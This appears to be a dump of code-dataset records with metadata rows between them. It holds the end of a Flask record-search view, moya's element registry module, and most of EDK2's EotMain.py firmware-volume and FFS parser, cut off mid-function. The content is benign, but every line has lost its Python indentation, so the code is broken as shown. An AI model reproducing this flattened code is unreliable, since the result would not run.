# Get search terms
record = []
# For table headers of HTML tables
headers = {}
if request.method == 'POST':
try:
firstName = cgi.escape(request.form['firstname'], True).lower().replace(' ', '')
lastName = cgi.escape(request.form['lastname'], True).lower().replace(' ', '')
year = cgi.escape(request.form['year'], True)
# print 'firstname = %s \nlastName = %s, \nyear =%s ' %(firstName, lastName, year)
if(not year):
year = None
if( (not firstName) or (firstName.isspace()) ):
firstName = None
if( (not lastName) or (lastName.isspace()) ):
lastName = None
# Retrieve query from the datastore.
# record = DB query results
# header = for rendering table headers
record = Oldboy.get_record(firstName, lastName, year)
# print "record = %s" %(record)
if (record is not None):
count = len(record)
headers = record[0]
# Records sorted by Last names
sorted_records = sorted(record, key=lambda k: k['Last Name'])
# print "Dict = ", sorted_records
return render_template('results.html', records = sorted_records, \
headers = headers, \
count = count)
return render_template('notfound.html')
except Exception as e:
print "Woah horsey! This shouldn't be happening!"
logging.error(sys.exc_info())
print e
# Redirect to "not_found" page
return render_template('notfound.html')
# For GET requests
return redirect(url_for('index'))
@app.route('/addrecord')
def addrecord():
""" Page contains Google form embedded for entering new record."""
return render_template('addrecord.html')
@app.errorhandler(404)
def page_not_found(e):
"""Return a custom 404 error."""
return 'Sorry, Nothing at this URL.', 404
@app.errorhandler(500)
def server_error(e):
"""Return a custom 500 error."""
return 'Sorry, unexpected error: {}'.format(e), 500
|
mit
| 7,525,898,457,323,794,000 | 29.611511 | 102 | 0.594595 | false |
moyaproject/moya
|
moya/elements/registry.py
|
1
|
4712
|
from __future__ import unicode_literals
from .. import errors
from ..tools import extract_namespace
from .. import namespaces
from ..compat import itervalues
from collections import defaultdict
import inspect
class Meta(object):
logic_skip = False
virtual_tag = False
is_call = False
is_try = False
is_loop = False
app_first_arg = False
text_nodes = None
trap_exceptions = False
translate = False
class ElementRegistry(object):
default_registry = None
_registry_stack = []
def clear(self):
self._registry.clear()
self._dynamic_elements.clear()
del self._registry_stack[:]
@classmethod
def push_registry(cls, registry):
cls._registry_stack.append(registry)
@classmethod
def pop_registry(cls):
cls._registry_stack.pop()
@classmethod
def get_default(cls):
return cls._registry_stack[-1]
def __init__(self, update_from_default=True):
self._registry = defaultdict(dict)
self._dynamic_elements = {}
if update_from_default:
self._registry.update(self.default_registry._registry)
self._dynamic_elements.update(self.default_registry._dynamic_elements)
def clone(self):
"""Return a copy of this registry"""
registry = ElementRegistry(update_from_default=False)
registry._registry = self._registry.copy()
registry._dynamic_elements = self._dynamic_elements.copy()
return registry
def set_default(self):
"""Reset this registry to the default registry (before project loaded)"""
self._registry = self.default_registry._registry.copy()
self._dynamic_elements = self.default_registry._dynamic_elements.copy()
def register_element(self, xmlns, name, element):
"""Add a dynamic element to the element registry"""
xmlns = xmlns or namespaces.run
if name in self._registry[xmlns]:
element_class = self._registry[xmlns][name]
definition = getattr(element_class, "_location", None)
if definition is None:
definition = inspect.getfile(element_class)
if xmlns:
raise errors.ElementError(
'<{}> already registered in "{}" for xmlns "{}"'.format(
name, definition, xmlns
),
element=getattr(element, "element", element),
)
else:
raise errors.ElementError(
'<{}/> already registered in "{}"'.format(name, definition),
element=element,
)
self._registry[xmlns][name] = element
def add_dynamic_registry(self, xmlns, element_callable):
"""Add a dynamic registry (element factory)"""
self._dynamic_elements[xmlns] = element_callable
def clear_registry(self):
"""Clear the registry (called on archive reload)"""
self._registry.clear()
def get_elements_in_xmlns(self, xmlns):
"""Get all elements defined within a given namespace"""
return self._registry.get(xmlns, {})
def get_elements_in_lib(self, long_name):
"""Get all elements defined by a given library"""
lib_elements = []
for namespace in itervalues(self._registry):
lib_elements.extend(
element
for element in itervalues(namespace)
if element._lib_long_name == long_name
)
return lib_elements
def get_element_type(self, xmlns, name):
"""Get an element by namespace and name"""
if xmlns in self._dynamic_elements:
return self._dynamic_elements[xmlns](name)
return self._registry.get(xmlns, {}).get(name, None)
def find_xmlns(self, name):
"""Find the xmlns with contain a given tag, or return None"""
for xmlns in sorted(self._registry.keys()):
if name in self._registry[xmlns]:
return xmlns
return None
def check_namespace(self, xmlns):
"""Check if a namespace exists in the registry"""
return xmlns in self._registry
def set_registry(self, registry):
"""Restore a saved registry"""
self._registry = registry._registry.copy()
self._dynamic_elements = registry._dynamic_elements.copy()
def get_tag(self, tag):
"""Get a tag from it's name (in Clarke's notation)"""
return self.get_element_type(*extract_namespace(tag))
default_registry = ElementRegistry.default_registry = ElementRegistry(
update_from_default=False
)
ElementRegistry.push_registry(ElementRegistry.default_registry)
|
mit
| -1,306,243,355,464,368,600 | 31.951049 | 82 | 0.610781 | false |
MattDevo/edk2
|
BaseTools/Source/Python/Eot/EotMain.py
|
1
|
69215
|
## @file
# This file is used to be the main entrance of EOT tool
#
# Copyright (c) 2008 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
import Common.LongFilePathOs as os, time, glob
import Common.EdkLogger as EdkLogger
import Eot.EotGlobalData as EotGlobalData
from optparse import OptionParser
from Common.StringUtils import NormPath
from Common import BuildToolError
from Common.Misc import GuidStructureStringToGuidString, sdict
from Eot.Parser import *
from Eot.InfParserLite import EdkInfParser
from Common.StringUtils import GetSplitValueList
from Eot import c
from Eot import Database
from array import array
from Eot.Report import Report
from Common.BuildVersion import gBUILD_VERSION
from Eot.Parser import ConvertGuid
from Common.LongFilePathSupport import OpenLongFilePath as open
import struct
import uuid
import copy
import codecs
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
gGuidStringFormat = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X"
gIndention = -4
class Image(array):
_HEADER_ = struct.Struct("")
_HEADER_SIZE_ = _HEADER_.size
def __new__(cls, *args, **kwargs):
return array.__new__(cls, 'B')
def __init__(self, ID=None):
if ID is None:
self._ID_ = str(uuid.uuid1()).upper()
else:
self._ID_ = ID
self._BUF_ = None
self._LEN_ = None
self._OFF_ = None
self._SubImages = sdict() # {offset: Image()}
array.__init__(self)
def __repr__(self):
return self._ID_
def __len__(self):
Len = array.__len__(self)
for Offset in self._SubImages.keys():
Len += len(self._SubImages[Offset])
return Len
def _Unpack(self):
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._LEN_])
return len(self)
def _Pack(self, PadByte=0xFF):
raise NotImplementedError
def frombuffer(self, Buffer, Offset=0, Size=None):
self._BUF_ = Buffer
self._OFF_ = Offset
# we may need the Size information in advance if it's given
self._LEN_ = Size
self._LEN_ = self._Unpack()
def empty(self):
del self[0:]
def GetField(self, FieldStruct, Offset=0):
return FieldStruct.unpack_from(self, Offset)
def SetField(self, FieldStruct, Offset, *args):
# check if there's enough space
Size = FieldStruct.size
if Size > len(self):
self.extend([0] * (Size - len(self)))
FieldStruct.pack_into(self, Offset, *args)
def _SetData(self, Data):
if len(self) < self._HEADER_SIZE_:
self.extend([0] * (self._HEADER_SIZE_ - len(self)))
else:
del self[self._HEADER_SIZE_:]
self.extend(Data)
def _GetData(self):
if len(self) > self._HEADER_SIZE_:
return self[self._HEADER_SIZE_:]
return None
Data = property(_GetData, _SetData)
## CompressedImage() class
#
# A class for Compressed Image
#
class CompressedImage(Image):
# UncompressedLength = 4-byte
# CompressionType = 1-byte
_HEADER_ = struct.Struct("1I 1B")
_HEADER_SIZE_ = _HEADER_.size
_ORIG_SIZE_ = struct.Struct("1I")
_CMPRS_TYPE_ = struct.Struct("4x 1B")
def __init__(self, CompressedData=None, CompressionType=None, UncompressedLength=None):
Image.__init__(self)
if UncompressedLength is not None:
self.UncompressedLength = UncompressedLength
if CompressionType is not None:
self.CompressionType = CompressionType
if CompressedData is not None:
self.Data = CompressedData
def __str__(self):
global gIndention
S = "algorithm=%s uncompressed=%x" % (self.CompressionType, self.UncompressedLength)
for Sec in self.Sections:
S += '\n' + str(Sec)
return S
def _SetOriginalSize(self, Size):
self.SetField(self._ORIG_SIZE_, 0, Size)
def _GetOriginalSize(self):
return self.GetField(self._ORIG_SIZE_)[0]
def _SetCompressionType(self, Type):
self.SetField(self._CMPRS_TYPE_, 0, Type)
def _GetCompressionType(self):
return self.GetField(self._CMPRS_TYPE_)[0]
def _GetSections(self):
try:
TmpData = DeCompress('Efi', self[self._HEADER_SIZE_:])
DecData = array('B')
DecData.fromstring(TmpData)
except:
TmpData = DeCompress('Framework', self[self._HEADER_SIZE_:])
DecData = array('B')
DecData.fromstring(TmpData)
SectionList = []
Offset = 0
while Offset < len(DecData):
Sec = Section()
try:
Sec.frombuffer(DecData, Offset)
Offset += Sec.Size
# the section is aligned to 4-byte boundary
except:
break
SectionList.append(Sec)
return SectionList
UncompressedLength = property(_GetOriginalSize, _SetOriginalSize)
CompressionType = property(_GetCompressionType, _SetCompressionType)
Sections = property(_GetSections)
## Ui() class
#
# A class for Ui
#
class Ui(Image):
_HEADER_ = struct.Struct("")
_HEADER_SIZE_ = 0
def __init__(self):
Image.__init__(self)
def __str__(self):
return self.String
def _Unpack(self):
# keep header in this Image object
self.empty()
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._LEN_])
return len(self)
def _GetUiString(self):
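        # The UI section payload is a UTF-16LE string; the [0:-2] slice below drops
        # the trailing two-byte NUL terminator before decoding.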
return codecs.utf_16_decode(self[0:-2].tostring())[0]
String = property(_GetUiString)
## Depex() class
#
# A class for Depex
#
class Depex(Image):
_HEADER_ = struct.Struct("")
_HEADER_SIZE_ = 0
_GUID_ = struct.Struct("1I2H8B")
_OPCODE_ = struct.Struct("1B")
_OPCODE_STRING_ = {
0x00 : "BEFORE",
0x01 : "AFTER",
0x02 : "PUSH",
0x03 : "AND",
0x04 : "OR",
0x05 : "NOT",
0x06 : "TRUE",
0x07 : "FALSE",
0x08 : "END",
0x09 : "SOR"
}
_NEXT_ = {
        -1   : _OPCODE_,   # first one in depex must be an opcode
0x00 : _GUID_, #"BEFORE",
0x01 : _GUID_, #"AFTER",
0x02 : _GUID_, #"PUSH",
0x03 : _OPCODE_, #"AND",
0x04 : _OPCODE_, #"OR",
0x05 : _OPCODE_, #"NOT",
0x06 : _OPCODE_, #"TRUE",
0x07 : _OPCODE_, #"FALSE",
0x08 : None, #"END",
0x09 : _OPCODE_, #"SOR"
}
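    # Illustrative decoding (hypothetical byte stream): PUSH <guidA> PUSH <guidB> AND END
    # yields Expression == [0x02, guidA, 0x02, guidB, 0x03, 0x08]; a GUID is expected
    # only after BEFORE/AFTER/PUSH, every other opcode is followed by another opcode.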
def __init__(self):
Image.__init__(self)
self._ExprList = []
def __str__(self):
global gIndention
gIndention += 4
Indention = ' ' * gIndention
S = '\n'
for T in self.Expression:
if T in self._OPCODE_STRING_:
S += Indention + self._OPCODE_STRING_[T]
if T not in [0x00, 0x01, 0x02]:
S += '\n'
else:
S += ' ' + gGuidStringFormat % T + '\n'
gIndention -= 4
return S
def _Unpack(self):
# keep header in this Image object
self.empty()
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._LEN_])
return len(self)
def _GetExpression(self):
if self._ExprList == []:
Offset = 0
CurrentData = self._OPCODE_
while Offset < len(self):
Token = CurrentData.unpack_from(self, Offset)
Offset += CurrentData.size
if len(Token) == 1:
Token = Token[0]
if Token in self._NEXT_:
CurrentData = self._NEXT_[Token]
else:
CurrentData = self._GUID_
else:
CurrentData = self._OPCODE_
self._ExprList.append(Token)
if CurrentData is None:
break
return self._ExprList
Expression = property(_GetExpression)
## FirmwareVolume() class
#
# A class for Firmware Volume
#
class FirmwareVolume(Image):
# Read FvLength, Attributes, HeaderLength, Checksum
_HEADER_ = struct.Struct("16x 1I2H8B 1Q 4x 1I 1H 1H")
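    # Assumed field layout: 16-byte ZeroVector (skipped), FileSystemGuid, FvLength,
    # 4-byte signature (skipped), Attributes, HeaderLength, Checksum.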
_HEADER_SIZE_ = _HEADER_.size
_FfsGuid = "8C8CE578-8A3D-4F1C-9935-896185C32DD3"
_GUID_ = struct.Struct("16x 1I2H8B")
_LENGTH_ = struct.Struct("16x 16x 1Q")
_SIG_ = struct.Struct("16x 16x 8x 1I")
_ATTR_ = struct.Struct("16x 16x 8x 4x 1I")
_HLEN_ = struct.Struct("16x 16x 8x 4x 4x 1H")
_CHECKSUM_ = struct.Struct("16x 16x 8x 4x 4x 2x 1H")
def __init__(self, Name=''):
Image.__init__(self)
self.Name = Name
self.FfsDict = sdict()
self.OrderedFfsDict = sdict()
self.UnDispatchedFfsDict = sdict()
self.ProtocolList = sdict()
def CheckArchProtocol(self):
for Item in EotGlobalData.gArchProtocolGuids:
if Item.lower() not in EotGlobalData.gProtocolList:
return False
return True
def ParseDepex(self, Depex, Type):
List = None
if Type == 'Ppi':
List = EotGlobalData.gPpiList
if Type == 'Protocol':
List = EotGlobalData.gProtocolList
DepexStack = []
DepexList = []
DepexString = ''
FileDepex = None
CouldBeLoaded = True
for Index in range(0, len(Depex.Expression)):
Item = Depex.Expression[Index]
if Item == 0x00:
Index = Index + 1
Guid = gGuidStringFormat % Depex.Expression[Index]
if Guid in self.OrderedFfsDict and Depex.Expression[Index + 1] == 0x08:
return (True, 'BEFORE %s' % Guid, [Guid, 'BEFORE'])
elif Item == 0x01:
Index = Index + 1
Guid = gGuidStringFormat % Depex.Expression[Index]
if Guid in self.OrderedFfsDict and Depex.Expression[Index + 1] == 0x08:
return (True, 'AFTER %s' % Guid, [Guid, 'AFTER'])
elif Item == 0x02:
Index = Index + 1
Guid = gGuidStringFormat % Depex.Expression[Index]
if Guid.lower() in List:
DepexStack.append(True)
DepexList.append(Guid)
else:
DepexStack.append(False)
DepexList.append(Guid)
continue
elif Item == 0x03 or Item == 0x04:
DepexStack.append(eval(str(DepexStack.pop()) + ' ' + Depex._OPCODE_STRING_[Item].lower() + ' ' + str(DepexStack.pop())))
DepexList.append(str(DepexList.pop()) + ' ' + Depex._OPCODE_STRING_[Item].upper() + ' ' + str(DepexList.pop()))
elif Item == 0x05:
DepexStack.append(eval(Depex._OPCODE_STRING_[Item].lower() + ' ' + str(DepexStack.pop())))
DepexList.append(Depex._OPCODE_STRING_[Item].lower() + ' ' + str(DepexList.pop()))
elif Item == 0x06:
DepexStack.append(True)
DepexList.append('TRUE')
DepexString = DepexString + 'TRUE' + ' '
elif Item == 0x07:
DepexStack.append(False)
DepexList.append('False')
DepexString = DepexString + 'FALSE' + ' '
elif Item == 0x08:
if Index != len(Depex.Expression) - 1:
CouldBeLoaded = False
else:
CouldBeLoaded = DepexStack.pop()
else:
CouldBeLoaded = False
if DepexList != []:
DepexString = DepexList[0].strip()
return (CouldBeLoaded, DepexString, FileDepex)
def Dispatch(self, Db=None):
if Db is None:
return False
self.UnDispatchedFfsDict = copy.copy(self.FfsDict)
        # Find PeiCore, DxeCore, PeiPriori, DxePriori first
FfsSecCoreGuid = None
FfsPeiCoreGuid = None
FfsDxeCoreGuid = None
FfsPeiPrioriGuid = None
FfsDxePrioriGuid = None
for FfsID in self.UnDispatchedFfsDict.keys():
Ffs = self.UnDispatchedFfsDict[FfsID]
if Ffs.Type == 0x03:
FfsSecCoreGuid = FfsID
continue
if Ffs.Type == 0x04:
FfsPeiCoreGuid = FfsID
continue
if Ffs.Type == 0x05:
FfsDxeCoreGuid = FfsID
continue
if Ffs.Guid.lower() == PEI_APRIORI_GUID.lower():
FfsPeiPrioriGuid = FfsID
continue
if Ffs.Guid.lower() == DXE_APRIORI_GUID.lower():
FfsDxePrioriGuid = FfsID
continue
# Parse SEC_CORE first
if FfsSecCoreGuid is not None:
self.OrderedFfsDict[FfsSecCoreGuid] = self.UnDispatchedFfsDict.pop(FfsSecCoreGuid)
self.LoadPpi(Db, FfsSecCoreGuid)
# Parse PEI first
if FfsPeiCoreGuid is not None:
self.OrderedFfsDict[FfsPeiCoreGuid] = self.UnDispatchedFfsDict.pop(FfsPeiCoreGuid)
self.LoadPpi(Db, FfsPeiCoreGuid)
if FfsPeiPrioriGuid is not None:
                # Load the PEIMs listed in the PEI a priori file
FfsPeiPriori = self.UnDispatchedFfsDict.pop(FfsPeiPrioriGuid)
if len(FfsPeiPriori.Sections) == 1:
Section = FfsPeiPriori.Sections.popitem()[1]
if Section.Type == 0x19:
GuidStruct = struct.Struct('1I2H8B')
Start = 4
while len(Section) > Start:
Guid = GuidStruct.unpack_from(Section[Start : Start + 16])
GuidString = gGuidStringFormat % Guid
Start = Start + 16
if GuidString in self.UnDispatchedFfsDict:
self.OrderedFfsDict[GuidString] = self.UnDispatchedFfsDict.pop(GuidString)
self.LoadPpi(Db, GuidString)
self.DisPatchPei(Db)
# Parse DXE then
if FfsDxeCoreGuid is not None:
self.OrderedFfsDict[FfsDxeCoreGuid] = self.UnDispatchedFfsDict.pop(FfsDxeCoreGuid)
self.LoadProtocol(Db, FfsDxeCoreGuid)
if FfsDxePrioriGuid is not None:
                # Load the DXE drivers listed in the DXE a priori file
FfsDxePriori = self.UnDispatchedFfsDict.pop(FfsDxePrioriGuid)
if len(FfsDxePriori.Sections) == 1:
Section = FfsDxePriori.Sections.popitem()[1]
if Section.Type == 0x19:
GuidStruct = struct.Struct('1I2H8B')
Start = 4
while len(Section) > Start:
Guid = GuidStruct.unpack_from(Section[Start : Start + 16])
GuidString = gGuidStringFormat % Guid
Start = Start + 16
if GuidString in self.UnDispatchedFfsDict:
self.OrderedFfsDict[GuidString] = self.UnDispatchedFfsDict.pop(GuidString)
self.LoadProtocol(Db, GuidString)
self.DisPatchDxe(Db)
def LoadProtocol(self, Db, ModuleGuid):
SqlCommand = """select GuidValue from Report
where SourceFileFullPath in
(select Value1 from Inf where BelongsToFile =
(select BelongsToFile from Inf
where Value1 = 'FILE_GUID' and Value2 like '%s' and Model = %s)
and Model = %s)
and ItemType = 'Protocol' and ItemMode = 'Produced'""" \
% (ModuleGuid, 5001, 3007)
RecordSet = Db.TblReport.Exec(SqlCommand)
for Record in RecordSet:
SqlCommand = """select Value2 from Inf where BelongsToFile =
(select DISTINCT BelongsToFile from Inf
where Value1 =
(select SourceFileFullPath from Report
where GuidValue like '%s' and ItemMode = 'Callback'))
and Value1 = 'FILE_GUID'""" % Record[0]
CallBackSet = Db.TblReport.Exec(SqlCommand)
if CallBackSet != []:
EotGlobalData.gProtocolList[Record[0].lower()] = ModuleGuid
else:
EotGlobalData.gProtocolList[Record[0].lower()] = ModuleGuid
def LoadPpi(self, Db, ModuleGuid):
SqlCommand = """select GuidValue from Report
where SourceFileFullPath in
(select Value1 from Inf where BelongsToFile =
(select BelongsToFile from Inf
where Value1 = 'FILE_GUID' and Value2 like '%s' and Model = %s)
and Model = %s)
and ItemType = 'Ppi' and ItemMode = 'Produced'""" \
% (ModuleGuid, 5001, 3007)
RecordSet = Db.TblReport.Exec(SqlCommand)
for Record in RecordSet:
EotGlobalData.gPpiList[Record[0].lower()] = ModuleGuid
def DisPatchDxe(self, Db):
IsInstalled = False
ScheduleList = sdict()
for FfsID in self.UnDispatchedFfsDict.keys():
CouldBeLoaded = False
DepexString = ''
FileDepex = None
Ffs = self.UnDispatchedFfsDict[FfsID]
if Ffs.Type == 0x07:
# Get Depex
IsFoundDepex = False
for Section in Ffs.Sections.values():
# Find Depex
if Section.Type == 0x13:
IsFoundDepex = True
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(Section._SubImages[4], 'Protocol')
break
if Section.Type == 0x01:
CompressSections = Section._SubImages[4]
for CompressSection in CompressSections.Sections:
if CompressSection.Type == 0x13:
IsFoundDepex = True
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(CompressSection._SubImages[4], 'Protocol')
break
if CompressSection.Type == 0x02:
NewSections = CompressSection._SubImages[4]
for NewSection in NewSections.Sections:
if NewSection.Type == 0x13:
IsFoundDepex = True
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(NewSection._SubImages[4], 'Protocol')
break
                # Depex not found
if not IsFoundDepex:
CouldBeLoaded = self.CheckArchProtocol()
DepexString = ''
FileDepex = None
# Append New Ffs
if CouldBeLoaded:
IsInstalled = True
NewFfs = self.UnDispatchedFfsDict.pop(FfsID)
NewFfs.Depex = DepexString
if FileDepex is not None:
ScheduleList.insert(FileDepex[1], FfsID, NewFfs, FileDepex[0])
else:
ScheduleList[FfsID] = NewFfs
else:
self.UnDispatchedFfsDict[FfsID].Depex = DepexString
for FfsID in ScheduleList.keys():
NewFfs = ScheduleList.pop(FfsID)
FfsName = 'UnKnown'
self.OrderedFfsDict[FfsID] = NewFfs
self.LoadProtocol(Db, FfsID)
SqlCommand = """select Value2 from Inf
where BelongsToFile = (select BelongsToFile from Inf where Value1 = 'FILE_GUID' and lower(Value2) = lower('%s') and Model = %s)
and Model = %s and Value1='BASE_NAME'""" % (FfsID, 5001, 5001)
RecordSet = Db.TblReport.Exec(SqlCommand)
if RecordSet != []:
FfsName = RecordSet[0][0]
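        # Anything dispatched in this pass may produce protocols that satisfy the
        # depex of still-undispatched modules, so re-run until nothing new installs.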
if IsInstalled:
self.DisPatchDxe(Db)
def DisPatchPei(self, Db):
IsInstalled = False
for FfsID in self.UnDispatchedFfsDict.keys():
CouldBeLoaded = True
DepexString = ''
FileDepex = None
Ffs = self.UnDispatchedFfsDict[FfsID]
if Ffs.Type == 0x06 or Ffs.Type == 0x08:
# Get Depex
for Section in Ffs.Sections.values():
if Section.Type == 0x1B:
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(Section._SubImages[4], 'Ppi')
break
if Section.Type == 0x01:
CompressSections = Section._SubImages[4]
for CompressSection in CompressSections.Sections:
if CompressSection.Type == 0x1B:
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(CompressSection._SubImages[4], 'Ppi')
break
if CompressSection.Type == 0x02:
NewSections = CompressSection._SubImages[4]
for NewSection in NewSections.Sections:
if NewSection.Type == 0x1B:
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(NewSection._SubImages[4], 'Ppi')
break
# Append New Ffs
if CouldBeLoaded:
IsInstalled = True
NewFfs = self.UnDispatchedFfsDict.pop(FfsID)
NewFfs.Depex = DepexString
self.OrderedFfsDict[FfsID] = NewFfs
self.LoadPpi(Db, FfsID)
else:
self.UnDispatchedFfsDict[FfsID].Depex = DepexString
if IsInstalled:
self.DisPatchPei(Db)
def __str__(self):
global gIndention
gIndention += 4
FvInfo = '\n' + ' ' * gIndention
FvInfo += "[FV:%s] file_system=%s size=%x checksum=%s\n" % (self.Name, self.FileSystemGuid, self.Size, self.Checksum)
FfsInfo = "\n".join([str(self.FfsDict[FfsId]) for FfsId in self.FfsDict])
gIndention -= 4
return FvInfo + FfsInfo
def _Unpack(self):
Size = self._LENGTH_.unpack_from(self._BUF_, self._OFF_)[0]
self.empty()
self.extend(self._BUF_[self._OFF_:self._OFF_ + Size])
# traverse the FFS
EndOfFv = Size
FfsStartAddress = self.HeaderSize
LastFfsObj = None
while FfsStartAddress < EndOfFv:
FfsObj = Ffs()
FfsObj.frombuffer(self, FfsStartAddress)
FfsId = repr(FfsObj)
if ((self.Attributes & 0x00000800) != 0 and len(FfsObj) == 0xFFFFFF) \
or ((self.Attributes & 0x00000800) == 0 and len(FfsObj) == 0):
if LastFfsObj is not None:
LastFfsObj.FreeSpace = EndOfFv - LastFfsObj._OFF_ - len(LastFfsObj)
else:
if FfsId in self.FfsDict:
EdkLogger.error("FV", 0, "Duplicate GUID in FFS",
ExtraData="\t%s @ %s\n\t%s @ %s" \
% (FfsObj.Guid, FfsObj.Offset,
self.FfsDict[FfsId].Guid, self.FfsDict[FfsId].Offset))
self.FfsDict[FfsId] = FfsObj
if LastFfsObj is not None:
LastFfsObj.FreeSpace = FfsStartAddress - LastFfsObj._OFF_ - len(LastFfsObj)
FfsStartAddress += len(FfsObj)
#
# align to next 8-byte aligned address: A = (A + 8 - 1) & (~(8 - 1))
# The next FFS must be at the latest next 8-byte aligned address
#
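            # e.g. an FFS ending at 0x0029 starts the next file at 0x0030, while
            # 0x0038 is already aligned and stays 0x0038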
FfsStartAddress = (FfsStartAddress + 7) & (~7)
LastFfsObj = FfsObj
def _GetAttributes(self):
return self.GetField(self._ATTR_, 0)[0]
def _GetSize(self):
return self.GetField(self._LENGTH_, 0)[0]
def _GetChecksum(self):
return self.GetField(self._CHECKSUM_, 0)[0]
def _GetHeaderLength(self):
return self.GetField(self._HLEN_, 0)[0]
def _GetFileSystemGuid(self):
return gGuidStringFormat % self.GetField(self._GUID_, 0)
Attributes = property(_GetAttributes)
Size = property(_GetSize)
Checksum = property(_GetChecksum)
HeaderSize = property(_GetHeaderLength)
FileSystemGuid = property(_GetFileSystemGuid)
## GuidDefinedImage() class
#
# A class for GUID Defined Image
#
class GuidDefinedImage(Image):
_HEADER_ = struct.Struct("1I2H8B 1H 1H")
_HEADER_SIZE_ = _HEADER_.size
_GUID_ = struct.Struct("1I2H8B")
_DATA_OFFSET_ = struct.Struct("16x 1H")
_ATTR_ = struct.Struct("18x 1H")
CRC32_GUID = "FC1BCDB0-7D31-49AA-936A-A4600D9DD083"
TIANO_COMPRESS_GUID = 'A31280AD-481E-41B6-95E8-127F4C984779'
LZMA_COMPRESS_GUID = 'EE4E5898-3914-4259-9D6E-DC7BD79403CF'
def __init__(self, SectionDefinitionGuid=None, DataOffset=None, Attributes=None, Data=None):
Image.__init__(self)
if SectionDefinitionGuid is not None:
self.SectionDefinitionGuid = SectionDefinitionGuid
if DataOffset is not None:
self.DataOffset = DataOffset
if Attributes is not None:
self.Attributes = Attributes
if Data is not None:
self.Data = Data
def __str__(self):
S = "guid=%s" % (gGuidStringFormat % self.SectionDefinitionGuid)
for Sec in self.Sections:
S += "\n" + str(Sec)
return S
def _Unpack(self):
# keep header in this Image object
self.empty()
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._LEN_])
return len(self)
def _SetAttribute(self, Attribute):
self.SetField(self._ATTR_, 0, Attribute)
def _GetAttribute(self):
return self.GetField(self._ATTR_)[0]
def _SetGuid(self, Guid):
self.SetField(self._GUID_, 0, Guid)
def _GetGuid(self):
return self.GetField(self._GUID_)
def _SetDataOffset(self, Offset):
self.SetField(self._DATA_OFFSET_, 0, Offset)
def _GetDataOffset(self):
return self.GetField(self._DATA_OFFSET_)[0]
def _GetSections(self):
SectionList = []
Guid = gGuidStringFormat % self.SectionDefinitionGuid
if Guid == self.CRC32_GUID:
# skip the CRC32 value, we don't do CRC32 verification here
Offset = self.DataOffset - 4
while Offset < len(self):
Sec = Section()
try:
Sec.frombuffer(self, Offset)
Offset += Sec.Size
# the section is aligned to 4-byte boundary
Offset = (Offset + 3) & (~3)
except:
break
SectionList.append(Sec)
elif Guid == self.TIANO_COMPRESS_GUID:
try:
# skip the header
Offset = self.DataOffset - 4
                TmpData = DeCompress('Framework', self[Offset:])
DecData = array('B')
DecData.fromstring(TmpData)
Offset = 0
while Offset < len(DecData):
Sec = Section()
try:
Sec.frombuffer(DecData, Offset)
Offset += Sec.Size
# the section is aligned to 4-byte boundary
Offset = (Offset + 3) & (~3)
except:
break
SectionList.append(Sec)
except:
pass
elif Guid == self.LZMA_COMPRESS_GUID:
try:
# skip the header
Offset = self.DataOffset - 4
                TmpData = DeCompress('Lzma', self[Offset:])
DecData = array('B')
DecData.fromstring(TmpData)
Offset = 0
while Offset < len(DecData):
Sec = Section()
try:
Sec.frombuffer(DecData, Offset)
Offset += Sec.Size
# the section is aligned to 4-byte boundary
Offset = (Offset + 3) & (~3)
except:
break
SectionList.append(Sec)
except:
pass
return SectionList
Attributes = property(_GetAttribute, _SetAttribute)
SectionDefinitionGuid = property(_GetGuid, _SetGuid)
DataOffset = property(_GetDataOffset, _SetDataOffset)
Sections = property(_GetSections)
## Section() class
#
# A class for Section
#
class Section(Image):
_TypeName = {
0x00 : "<unknown>",
0x01 : "COMPRESSION",
0x02 : "GUID_DEFINED",
0x10 : "PE32",
0x11 : "PIC",
0x12 : "TE",
0x13 : "DXE_DEPEX",
0x14 : "VERSION",
0x15 : "USER_INTERFACE",
0x16 : "COMPATIBILITY16",
0x17 : "FIRMWARE_VOLUME_IMAGE",
0x18 : "FREEFORM_SUBTYPE_GUID",
0x19 : "RAW",
0x1B : "PEI_DEPEX"
}
_SectionSubImages = {
0x01 : CompressedImage,
0x02 : GuidDefinedImage,
0x17 : FirmwareVolume,
0x13 : Depex,
0x1B : Depex,
0x15 : Ui
}
# Size = 3-byte
# Type = 1-byte
_HEADER_ = struct.Struct("3B 1B")
_HEADER_SIZE_ = _HEADER_.size
# SubTypeGuid
# _FREE_FORM_SUBTYPE_GUID_HEADER_ = struct.Struct("1I2H8B")
_SIZE_ = struct.Struct("3B")
_TYPE_ = struct.Struct("3x 1B")
def __init__(self, Type=None, Size=None):
Image.__init__(self)
self._Alignment = 1
if Type is not None:
self.Type = Type
if Size is not None:
self.Size = Size
def __str__(self):
global gIndention
gIndention += 4
SectionInfo = ' ' * gIndention
if self.Type in self._TypeName:
SectionInfo += "[SECTION:%s] offset=%x size=%x" % (self._TypeName[self.Type], self._OFF_, self.Size)
else:
SectionInfo += "[SECTION:%x<unknown>] offset=%x size=%x " % (self.Type, self._OFF_, self.Size)
for Offset in self._SubImages.keys():
SectionInfo += ", " + str(self._SubImages[Offset])
gIndention -= 4
return SectionInfo
def _Unpack(self):
self.empty()
Type, = self._TYPE_.unpack_from(self._BUF_, self._OFF_)
Size1, Size2, Size3 = self._SIZE_.unpack_from(self._BUF_, self._OFF_)
Size = Size1 + (Size2 << 8) + (Size3 << 16)
if Type not in self._SectionSubImages:
# no need to extract sub-image, keep all in this Image object
